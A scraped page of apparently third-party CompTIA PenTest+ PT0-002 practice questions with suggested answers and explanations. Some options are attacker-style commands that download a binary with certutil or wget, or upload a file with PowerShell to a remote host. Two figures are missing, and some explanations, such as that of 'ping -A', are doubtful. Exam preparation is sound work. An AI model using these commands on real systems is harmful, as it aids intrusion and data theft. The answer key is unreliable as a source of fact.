ExamGecko
Home Home / CompTIA / PT0-002

CompTIA PT0-002 Practice Test - Questions Answers, Page 3

Question list
Search
Search

List of questions

Search

Related questions











Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

A.
NDA
A.
NDA
Answers
B.
MSA
B.
MSA
Answers
C.
SOW
C.
SOW
Answers
D.
MOU
D.
MOU
Answers
Suggested answer: C

Explanation:

As mentioned in question 1, the SOW describes the specific activities, deliverables, and schedules for a penetration tester. The other documents are not relevant for this purpose. An NDA is a nondisclosure agreement that protects the confidentiality of the client's information. An MSA is a master service agreement that defines the general terms and conditions of a business relationship. An MOU is a memorandum of understanding that expresses a common intention or agreement between parties.

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

A.
PLCs will not act upon commands injected over the network.
A.
PLCs will not act upon commands injected over the network.
Answers
B.
Supervisors and controllers are on a separate virtual network by default.
B.
Supervisors and controllers are on a separate virtual network by default.
Answers
C.
Controllers will not validate the origin of commands.
C.
Controllers will not validate the origin of commands.
Answers
D.
Supervisory systems will detect a malicious injection of code/commands.
D.
Supervisory systems will detect a malicious injection of code/commands.
Answers
Suggested answer: C

Explanation:

PLCs are programmable logic controllers that execute logic operations on input signals from sensors and output signals to actuators. They are often connected to supervisory systems that provide human-machine interfaces and data acquisition functions. If both systems are connected to the company intranet, they are exposed to potential attacks from internal or external adversaries. A valid assumption is that controllers will not validate the origin of commands, meaning that an attacker can send malicious commands to manipulate or sabotage the industrial process. The other assumptions are not valid because they contradict the facts or common practices.

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

A.
A signed statement of work
A.
A signed statement of work
Answers
B.
The correct user accounts and associated passwords
B.
The correct user accounts and associated passwords
Answers
C.
The expected time frame of the assessment
C.
The expected time frame of the assessment
Answers
D.
The proper emergency contacts for the client
D.
The proper emergency contacts for the client
Answers
Suggested answer: A

Explanation:

According to the CompTIA PenTest+ Study Guide, Exam PT0-0021, a statement of work (SOW) is a document that defines the scope, objectives, deliverables, and terms of a penetration testing project. It is a formal agreement between the service provider and the client that specifies what is expected from both parties, including the timeline, budget, resources, and responsibilities. A SOW is essential for any penetration testing engagement, as it helps to avoid misunderstandings, conflicts, and legal issues.

The CompTIA PenTest+ Study Guide also provides an example of a SOW template that covers the following sections1:

Project overview: A brief summary of the project's purpose, scope, objectives, and deliverables. Project scope: A detailed description of the target system, network, or application that will be tested, including the boundaries, exclusions, and assumptions.

Project objectives: A clear statement of the expected outcomes and benefits of the project, such as identifying vulnerabilities, improving security posture, or complying with regulations.

Project deliverables: A list of the tangible products or services that will be provided by the service provider to the client, such as reports, recommendations, or remediation plans.

Project timeline: A schedule of the project's milestones and deadlines, such as kickoff meeting, testing phase, reporting phase, or closure meeting.

Project budget: A breakdown of the project's costs and expenses, such as labor hours, travel expenses, tools, or licenses.

Project resources: A specification of the project's human and technical resources, such as team members, roles, responsibilities, skills, or equipment.

Project terms and conditions: A statement of the project's legal and contractual aspects, such as confidentiality, liability, warranty, or dispute resolution.

The CompTIA PenTest+ Study Guide also explains why having a SOW is important before starting an assessment1:

It establishes a clear and mutual understanding of the project's scope and expectations between the service provider and the client.

It provides a basis for measuring the project's progress and performance against the agreed-upon objectives and deliverables.

It protects both parties from potential risks or disputes that may arise during or after the project.

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.

Which of the following commands would help the tester START this process?

A.
certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
A.
certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
Answers
B.
powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
B.
powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
Answers
C.
schtasks /query /fo LIST /v | find /I "Next Run Time:"
C.
schtasks /query /fo LIST /v | find /I "Next Run Time:"
Answers
D.
wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
D.
wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
Answers
Suggested answer: A

Explanation:

https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-downloadmalware-while-bypassing-av/

--- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

The certutil command is a Windows utility that can be used to manipulate certificates and certificate authorities. However, it can also be abused by attackers to download files from remote servers using the -urlcache option. In this case, the command downloads accesschk64.exe from http://192.168.2.124/windows-binaries/ and saves it locally. Accesschk64.exe is a tool that can be used to check service permissions and identify potential privilege escalation vectors. The other commands are not relevant for this purpose. Powershell is a scripting language that can be used to perform various tasks, but in this case it uploads a file instead of downloading one. Schtasks is a command that can be used to create or query scheduled tasks, but it does not help with service permissions. Wget is a Linux command that can be used to download files from the web, but it does not work on Windows by default.

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

A.
S/MIME
A.
S/MIME
Answers
B.
FTPS
B.
FTPS
Answers
C.
DNSSEC
C.
DNSSEC
Answers
D.
AS2
D.
AS2
Answers
Suggested answer: A

Explanation:

S/MIME stands for Secure/Multipurpose Internet Mail Extensions and is a standard for encrypting and signing email messages. It uses public key cryptography to ensure the confidentiality, integrity, and authenticity of email communications. FTPS is a protocol for transferring files securely over SSL/TLS, but it is not used for emailing. DNSSEC is a protocol for securing DNS records, but it does not protect email content. AS2 is a protocol for exchanging business documents over HTTP/S, but it is not used for emailing.

Reference: https://searchsecurity.techtarget.com/answer/What-are-the-most-important-emailsecurity-protocols

A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:

The following request was intercepted going to the network device:

GET /login HTTP/1.1

Host: 10.50.100.16

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept-Language: en-US,en;q=0.5

Connection: keep-alive

Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk

Network management interfaces are available on the production network.

An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report?

(Choose two.)

A.
Enforce enhanced password complexity requirements.
A.
Enforce enhanced password complexity requirements.
Answers
B.
Disable or upgrade SSH daemon.
B.
Disable or upgrade SSH daemon.
Answers
C.
Disable HTTP/301 redirect configuration.
C.
Disable HTTP/301 redirect configuration.
Answers
D.
Create an out-of-band network for management.
D.
Create an out-of-band network for management.
Answers
E.
Implement a better method for authentication.
E.
Implement a better method for authentication.
Answers
F.
Eliminate network management and control interfaces.
F.
Eliminate network management and control interfaces.
Answers
Suggested answer: D, E

Explanation:

The key findings indicate that the network device is vulnerable to several attacks, such as sniffing, brute-forcing, or exploiting the SSH daemon. To prevent these attacks, the best recommendations are to create an out-of-band network for management, which means a separate network that is not accessible from the production network, and to implement a better method for authentication, such as SSH keys or certificates. The other options are not as effective or relevant.

A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

A.
Windows
A.
Windows
Answers
B.
Apple
B.
Apple
Answers
C.
Linux
C.
Linux
Answers
D.
Android
D.
Android
Answers
Suggested answer: A

Explanation:

The ping -A command sends an ICMP echo request with a specified TTL value and displays the response. The TTL value indicates how many hops the packet can traverse before being discarded.

Different OSs have different default TTL values for their packets. Windows uses 128, Apple uses 64, Linux uses 64 or 255, and Android uses 64. Therefore, a packet with a TTL of 128 is most likely from a Windows OS.

Reference: https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems-withping/

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

A.
RFID cloning
A.
RFID cloning
Answers
B.
RFID tagging
B.
RFID tagging
Answers
C.
Meta tagging
C.
Meta tagging
Answers
D.
Tag nesting
D.
Tag nesting
Answers
Suggested answer: D

Explanation:

since vlan hopping requires 2 vlans to be nested in a single packet. Double tagging occurs when an attacker adds and modifies tags on an Ethernet frame to allow the sending of packets through any VLAN. This attack takes advantage of how many switches process tags. Most switches will only remove the outer tag and forward the frame to all native VLAN ports. With that said, this exploit is only successful if the attacker belongs to the native VLAN of the trunk link.

https://cybersecurity.att.com/blogs/security-essentials/vlan-hopping-and-mitigation

Tag nesting is a technique that involves inserting two VLAN tags into an Ethernet frame to bypass VLAN hopping prevention mechanisms. The first tag is stripped by the first switch, and the second tag is processed by the second switch, allowing the frame to reach a different VLAN than intended. RFID cloning is a technique that involves copying the data from an RFID tag to another tag or device. RFID tagging is a technique that involves attaching an RFID tag to an object or person for identification or tracking purposes. Meta tagging is a technique that involves adding metadata to web pages or files for search engine optimization or classification purposes.

A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:

* Connected to 10.2.11.144 (::1) port 80 (#0)

> GET /readmine.html HTTP/1.1

> Host: 10.2.11.144

> User-Agent: curl/7.67.0

> Accept: */*

>*

Mark bundle as not supporting multiuse

< HTTP/1.1 200

< Date: Tue, 02 Feb 2021 21:46:47 GMT

< Server: Apache/2.4.41 (Debian)

< Content-Length: 317

< Content-Type: text/html; charset=iso-8859-1

<<

!DOCTYPE html>

<html lang="en">

<head>

<meta name="viewport" content="width=device-width" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>WordPress ReadMe</title>

<link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" />

</head>

Which of the following tools would be BEST for the penetration tester to use to explore this site further?

A.
Burp Suite
A.
Burp Suite
Answers
B.
DirBuster
B.
DirBuster
Answers
C.
WPScan
C.
WPScan
Answers
D.
OWASP ZAP
D.
OWASP ZAP
Answers
Suggested answer: C

Explanation:

WPScan is a tool that can be used to scan WordPress sites for vulnerabilities, such as outdated plugins, themes, or core files, misconfigured settings, weak passwords, or user enumeration. The curl command reveals that the site is running WordPress and has a readme.html file that may disclose the version number. Therefore, WPScan would be the best tool to use to explore this site further. Burp Suite is a tool that can be used to intercept and modify web requests and responses, but it does not specialize in WordPress scanning. DirBuster is a tool that can be used to brute-force directories and files on web servers, but it does not exploit WordPress vulnerabilities. OWASP ZAP is a tool that can be used to perform web application security testing, but it does not focus on WordPress scanning.

Reference: https://tools.kali.org/web-applications/burpsuite

A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

A.
Look for open ports.
A.
Look for open ports.
Answers
B.
Listen for a reverse shell.
B.
Listen for a reverse shell.
Answers
C.
Attempt to flood open ports.
C.
Attempt to flood open ports.
Answers
D.
Create an encrypted tunnel.
D.
Create an encrypted tunnel.
Answers
Suggested answer: A

Explanation:

The script will perform a port scan on the target IP address, looking for open ports on a list of common ports. A port scan is a technique that probes a network or a system for open ports, which can reveal potential vulnerabilities or services running on the host.

Total 422 questions
Go to page: of 43